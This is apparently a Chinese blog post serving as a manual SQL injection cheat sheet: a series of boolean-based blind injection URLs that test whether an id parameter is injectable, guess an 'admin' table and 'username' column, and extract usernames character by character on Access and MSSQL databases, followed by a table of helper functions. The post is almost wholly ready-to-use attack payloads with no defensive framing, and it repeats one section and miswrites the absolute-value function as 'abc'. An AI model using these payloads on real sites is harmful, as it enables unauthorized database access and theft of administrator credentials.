手工檢測可否注入
- 發布于:2020-12-31
- 共 260 人圍觀
文章作者:yjd
□ 檢測可否注入
============================================================ ==================
http://url/xx?id=1111 and 1=1 (正常頁面)
http://url/xx?id=1111 and 1=2 (出錯頁面)
============================================================ ==================
□ 檢測表段的
============================================================ ==================
http://url/xx?id=1111 and exists (select * from admin)
============================================================ ==================
□ 檢測字段的
============================================================ ==================
http://url/xx?id=1111 and exists (select username from admin)
============================================================ ==================
□ 檢測ID
============================================================ ==================
http://url/xx?id=1111 and exists (select id from admin where ID=1)
============================================================ ==================
□ 檢測長度的
============================================================ ==================
http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1)
============================================================ ==================
□ 檢測長度的
============================================================ ==================
http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1)
============================================================ ==================
□ 檢測是否為MSSQL數據庫
============================================================ ==================
http://url/xx?id=1111 and exists (select * from sysobjects)
============================================================ ==================
□ 檢測是否為英文
============================================================ ==================
(ACCESS數據庫)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)
(MSSQL數據庫)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)
============================================================ ==================
□ 檢測英文的范圍
============================================================ ==================
(ACCESS數據庫)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)
(MSSQL數據庫)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)
============================================================ ==================
□ 檢測那個字符
============================================================ ==================
(ACCESS數據庫)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)
(MSSQL數據庫)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)
============================================================ ===================
常用函數
============================================================ ===================
Access:asc(字符) SQLServer:unicode(字符)
作用:返回某字符的ASCII碼
Access:chr(數字) SQLServer:nchar(數字)
作用:與asc相反,根據ASCII碼返回字符
Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)
作用:返回字符串從N個字符起長度為L的子字符串,即N到N+L之間的字符串
Access:abc(數字) SQLServer:abc (數字)
作用:返回數字的絕對值(在猜解漢字的時候會用到)
Access:A between B And C SQLServer:A between B And C
作用:判斷A是否界于B與C之間
標簽:
